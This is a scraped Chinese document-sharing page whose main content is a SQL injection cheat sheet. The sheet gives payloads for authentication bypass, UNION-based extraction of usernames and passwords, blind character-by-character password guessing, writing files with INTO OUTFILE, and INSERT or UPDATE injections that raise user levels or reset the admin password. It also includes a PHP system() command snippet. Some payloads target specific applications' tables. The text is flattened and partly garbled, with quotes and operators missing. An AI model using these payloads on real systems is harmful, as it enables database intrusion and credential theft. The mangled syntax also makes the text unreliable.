全文预览已结束
下载本文档
版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
or 1=1 or 1=1 /* %23 and password=mypass id=-1 union select 1,1,1 id=-1 union select char(97),char(97),char(97) id=1 union select 1,1,1 from members id=1 union select 1,1,1 from admin id=1 union select 1,1,1 from user userid=1 and password=mypass userid=1 and mid(password,3,1)=char(112) userid=1 and mid(password,4,1)=char(97) and ord(mid(password,3,1)111 (ord函数很好用,可以返回整形的) and LENGTH(password)=6(探测密码长度) and LEFT(password,1)=m and LEFT(password,2)=my 依次类推 union select 1,username,password from user/* union select 1,username,password from user/* = union select 1,username,password from user/* (可以是1或者=后直接跟) 99999 union select 1,username,password from user/* into outfile c:/file.txt (导出文件) = or 1=1 into outfile c:/file.txt 1 union select 1,username,password from user into outfile c:/user.txt SELECT password FROM admins WHERE login=John INTO DUMPFILE /path/to/site/file.txt id= union select 1,username,password from user into outfile id=-1 union select 1,database(),version() (灵活应用查询) 常用查询测试语句, SELECT * FROM table WHERE 1=1 SELECT * FROM table WHERE uuu=uuu SELECT * FROM table WHERE 12 SELECT * FROM table WHERE 32 SELECT * FROM table WHERE 20 THEN 1 END id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 (替换,寻找密码) union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1)=49 (验证第一位密码) union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1)=50 (第二位) union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1)=51 变换id进行测试(meteor) union%20(SELECT%20allowsmilies,public,userid,0000-0-0,user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate union%20(SELECT%20allowsmilies,public,userid,0000-0-0,pass(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2010)%20order%20by%20eventdate 构造语句: SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1) SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,username,password from user where userid=1) UNION%20(SELECT%201,0,2,1999-01-01,a,password%20FROM%20user%20WHERE%20userid%20=%205)%20order%20by%20eventdate UNION%20(SELECT%201,0,12695,1999-01-01,a,password%20FROM%20user%20WHERE%20userid=13465)%20order%20by%20eventdate UNION%20(SELECT%201,0,12695,1999-01-01,a,userid%20FROM%20user%20WHERE%20username=sandflee)%20order%20by%20eventdate (查沙子的id) (SELECT a FROM table_name WHERE a=10 AND B=1 ORDER BY a LIMIT 10) SELECT * FROM article WHERE articleid=$id UNION SELECT * FROM(字段和数据库相同情况下,可直接提交) SELECT * FROM article WHERE articleid=$id UNION SELECT 1,1,1,1,1,1,1 FROM(不同的情况下) 特殊技巧:在表单,搜索引擎等地方写: “_” “._ ” “% % ORDER BY articleid/* % ORDER BY articleid# _ ORDER BY articleid/* _ ORDER BY articleid# $command = dir c:;system($command); SELECT * FROM article WHERE articleid=$id SELECT * FROM article WHERE articleid=$id 1 and 1=2 union select * from user where userid=1/* 句中变为 (SELECT * FROM article WHERE articleid=1 and 1=2 union select * from user where userid=1/*) 1 and 1=2 union select * from user where userid=1 语句形式:建立一个库,插入: CREATE DATABASE injection CREATE TABLE user ( userid int(11) NOT NULL auto_increment, username varchar(20) NOT NULL default , password varchar(20) NOT NULL default , PRIMARY KEY (userid) ) ; INSERT INTO user VALUES (1, swap, mypass); 插如一个注册用户: INSERT INTO user (userid, username, password, homepage, userlevel) VALUES (, $username, $password, $homepage, 1); “INSERT INTO membres (login,password,nom,email,userlevel) VALUES ($login,$pass,$nom,$email,1); INSERT INTO membres (login,password,nom,email,userlevel) VALUES (,3)#,1) INSERT INTO membres SET login=$login,password=$pass,nom=$nom,email=$email; INSERT INTO membres SET login=,password=,nom=,userlevel=3,email= INSERT INTO membres VALUES ($id,$login,$pass,$nom,$email,1); UPDATE user SET password=$password, homepage=$homepage WHERE id=$id UPDATE user SET password=MD5(mypass) WHERE username=admin#), homepage=$homepage WHERE id=$id UPDATE membres SET password=$pass,nom=$nom,email=$email WHERE id=$id; UPDATE membres SET password=PASS,nom=,userlevel=3,email= WHERE id=ID UPDATE news SET Votes=Votes+1, score=score+$note WHERE idnews=$id; 长用函数: DATABASE() USER() SYSTEM_USER() SESSION_USER() CURRENT_USER() 比如: UPDATE article SET title=$title WHERE articleid=1 对应函数 UPDATE article SET title=DATABASE() WHERE id=1 #把当前数据库名更新到title字段 UPDATE article SET title=USER() WHERE id=1 #把当前 MySQL 用户名更新到title字段 UPDATE article SET title=SYSTEM_USER() WHERE id=1 #把当前 MySQL 用户名更新到title字段 UPDATE article SET title=SESSION_USER() WHERE id=1 #把当前 MySQL 用户名更新到title字段 UPDATE article SET title=CURRENT_USER() WHERE id=1 #把当前会话被验证匹配的用户名更新到title字段 : $req = SELECT * FROM membres WHERE name LIKE %$search% ORDER BY name; SELECT * FROM membres WHERE name LIKE % ORDER BY uid#% ORDER BY name SELECT * FROM membres WHERE name LIKE % ORDER BY uid#% ORDER BY name SELECT uid FROM admins WHERE login= OR a=a AND password= OR a=a
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 陶瓷烧成工高级工作计划及安排
- 职业女性回归后的身心调适指导手册
- 水电安装工程造价控制全解一级工程中需掌握要点
- 注册营养师工作手册营养健康计划与实践
- 互联网背景下无人机行业发展趋势分析报告针对初修岗位
- 磨工安全培训教材全集
- 县级体育人才飞镖面试指南
- 语言教师-TESOL-认证备考与教学计划安排
- 平舆八中2025寒假通知书
- 平顺小学寒假放假通知书
- 2024-2025学年广东省五校高二上学期期末联考化学试题(解析版)
- 教育部《高中语文新课程标准》
- 医学生创业计划实施路径
- 新生儿科入科培训
- 建筑材料员培训大纲
- 初中必背词汇1600(带翻译)-初中必背3000单词
- 《邮政企业、快递企业安全生产重大事故隐患判定标准》知识培训
- 校园绿化与劳动服务实施方案
- 家庭教育专题讲座课件
- G20风镐具有重量轻冲击能量大结构简单是理想的气动工具
- 门诊输液室工作制度
评论
0/150
提交评论